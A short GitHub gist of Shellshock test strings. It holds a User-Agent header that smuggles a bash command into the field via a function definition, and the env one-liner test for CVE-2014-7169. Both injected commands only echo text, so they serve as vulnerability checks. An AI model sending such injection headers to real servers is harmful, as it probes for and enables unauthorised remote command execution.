Skip to content

Instantly share code, notes, and snippets.

@tanaka-geek
Created March 29, 2021 11:22
Show Gist options
  • Save tanaka-geek/df93061f45f8073cc426694533ecbd0e to your computer and use it in GitHub Desktop.
Save tanaka-geek/df93061f45f8073cc426694533ecbd0e to your computer and use it in GitHub Desktop.
shellshock experience
User-Agent: () { :;}; /bin/bash -c "echo this is vulnerable"
env CVE_2014_7169='() { (a)=>\' bash -c "echo date"; cat echo
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment